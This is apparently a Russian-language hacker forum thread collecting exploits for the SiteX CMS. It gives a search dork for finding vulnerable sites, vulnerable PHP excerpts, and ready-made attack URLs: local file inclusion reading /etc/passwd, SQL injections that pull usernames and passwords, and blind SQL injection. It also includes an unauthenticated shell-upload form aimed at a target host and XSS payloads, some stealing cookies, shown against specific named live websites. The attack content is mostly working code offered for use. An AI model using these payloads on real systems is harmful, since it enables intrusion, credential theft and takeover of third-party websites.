Уязвимости SiteX 0.7 Beta download: http://jaist.dl.sourceforge.net/sourceforge/sitex/SiteX_074_build_418.zip dork: "Powered by SiteX 0.7 Beta" (выдачу гугла больше 10 линков не ставьте ) 1) [LFI] (требования: magic_quotes=off, register_globals=on) /themes/Corporate/homepage.php уязвимый код: PHP: include("themes/$THEME_FOLDER/header.php"); эксплуатирование: Code: /themes/Corporate/homepage.php?THEME_FOLDER=../../../../../../../../etc/passwd%00 2) [SQL-injection] (требования: magic_quotes=off, register_globals=on) links.php уязвимый код: PHP: if($category) { $query = "SELECT * FROM $DB_Links_Groups WHERE id='$category'"; $result = mysql_query($query, $Link) or queryError("8", mysql_error()); эксплуатирование: Code: /links.php?category=-1'+union+select+1,concat_ws(0x3a,username,password),3+from+sitex_users--+ P.S: шелл в админке аплоадится без проблем
Уязвимости SiteX 0.7 Beta Product : SiteX 0.7.4 build 405 PHPinfo Code: http://localhost/setup/phpinfo.php LFI PHP: include("themes/$THEME_FOLDER/header.php"); magic_quotes=off register_globals=on results : Code: http://localhost//themes/Fusion/homepage.php?THEME_FOLDER=../../../[...]%00 Code: http://localhost//themes/Joombo/homepage.php?THEME_FOLDER=../../../[...]%00 Code: http://localhost//themes/Streamline/homepage.php?THEME_FOLDER=../../../[...]%00 Code: http://localhost//themes/Structure/homepage.php?THEME_FOLDER=../../../[...]%00 SQL Injection magic_quotes=off, register_globals=on photo.php PHP: $query = "SELECT * FROM $DB_Photos WHERE id='$photoid'"; $result = mysql_query($query, $Link) or queryError("11", mysql_error()); $sxPhoto = mysql_fetch_object($result); $sxNewViews = $sxPhoto->views + 1; $sxQuery2 = "UPDATE $DB_Photos SET views='$sxNewViews' WHERE id='$photoid'"; $sxResult2 = mysql_query($sxQuery2, $Link) or queryError("10", mysql_error()); $queryA = "SELECT * FROM $DB_Photos_Albums WHERE id='$albumid'"; $resultA = mysql_query($queryA, $Link) or queryError("12", mysql_error()); $ROWA = mysql_fetch_object($resultA); result : Code: http://localhost/photo.php?photoid=4&albumid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8--+ SQL injection in Admin Panel magic_quotes=off, register_globals=on admin/page_edit.php PHP: $result = mysql_query($query, $Link) or queryError("38", mysql_error()); $query = "DELETE FROM $DB_Pages_Private WHERE pageid='$pageid'"; $result = mysql_query($query, $Link) or queryError("38", mysql_error()); if($private) { foreach ($user_types as $k => $v) { $query = "INSERT INTO $DB_Pages_Private (pageid, typeid) VALUES ('$pageid', '$k')"; $result = mysql_query($query, $Link) or queryError("38", mysql_error()); } } header("Location: ../page.php?pageid=$pageid&message=".str_replace(" ","_",$sxLang['MessagePageEdited'])); die(); } $query = "SELECT * FROM $DB_Pages WHERE id='$pageid'"; result : Code: http://localhost/admin/page_edit.php?pageid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7--+ admin/journal_edit.php PHP: $query = "UPDATE $DB_Journal SET title='$title', entry='$content', timestamp='$timestamp', month='$date_month', day='$date_day', year='$date_year' WHERE id='$entryid'"; $result = mysql_query($query, $Link) or queryError("21", mysql_error()); writeRSSXML(); header("Location: ../journal.php?sxEntryID=$entryid&message=".str_replace(" ","_",$sxLang['MessageJournalEdited'])); die(); //$message = $sxLang['MessageJournalEdited']; } $query = "SELECT * FROM $DB_Journal WHERE id='$entryid'"; $result = mysql_query($query, $Link) or queryError("21", mysql_error()); $ROW = mysql_fetch_object($result); result : Code: http://localhost/admin/journal_edit.php?entryid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8--+
5 копеек..) ------- 1) SQL injection(требования: mq=off, любой акк) file:/admin/profile_view.php PHP: $query2 = "SELECT * FROM $DB_Users, $DB_Users_Assoc, $DB_Users_Types WHERE $DB_Users.username='$user' AND $DB_Users.id=$DB_Users_Assoc.userid AND $DB_Users_Assoc.typeid=$DB_Users_Types.id"; $result2 = mysql_query($query2, $Link) or queryError("402", mysql_error()); result: Code: /admin/profile_view.php?user=-123456'+union+select+1,User(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+ 2)blind SQL injection(требования: mq=off,желательно 5 ветка бд) file: /forums_topic.php PHP: $query = "SELECT * FROM $DB_Forums_Posts WHERE id='$topicid'"; $result = mysql_query($query, $Link) or queryError("71", mysql_error()); result: Code: /forums_topic.php?topicid=1'+and+(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)+--+ //много скуль..
Внесу свой посильный вклад. [Version 0.8.0 RC 3 build 524] Заливка шела. Не требуеться ни прав, ни авторизации, ни чего то еще. File: includes/uploadify/uploadify.php PHP: if (!empty($_FILES)) { $tempFile = $_FILES['Filedata']['tmp_name']; $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/'; $targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name']; // $fileTypes = str_replace('*.','',$_REQUEST['fileext']); // $fileTypes = str_replace(';','|',$fileTypes); // $typesArray = split('\|',$fileTypes); // $fileParts = pathinfo($_FILES['Filedata']['name']); // if (in_array($fileParts['extension'],$typesArray)) { // Uncomment the following line if you want to make the directory if it doesn't exist // mkdir(str_replace('//','/',$targetPath), 0755, true); move_uploaded_file($tempFile,$targetFile); echo "1"; // } else { // echo 'Invalid file type.'; // } } Target: Exploit ^_^ Code: <form enctype="multipart/form-data" action="http://targethost.com/includes/uploadify/uploadify.php" method="post" > <input type="file" name="Filedata" /><input type="submit" /> <input type="text" name="folder" /> </form> Если же, начальник сайта, раскомментирует по дефолту закомментированые строчки, то допустимые расширения для файлов,можно будет передать в параметре fileext, записав туда .php
XSS Эксплуатация: Code: /index.php?sxMonth=1&sxYear=<scripT>alert('xss')</scripT> Примеры: Code: http://www.kolaewuosho.com/index.php?sxMonth=1&sxYear=<scripT>alert('ololo')</scripT> http://el-mirador.eu/index.php?sxMonth=1&sxYear=<scripT>alert('ololo')</scripT> http://www.thecocktailchefatlanta.com/index.php?sxMonth=1&sxYear=<scripT>alert(document.cookie)</scripT>
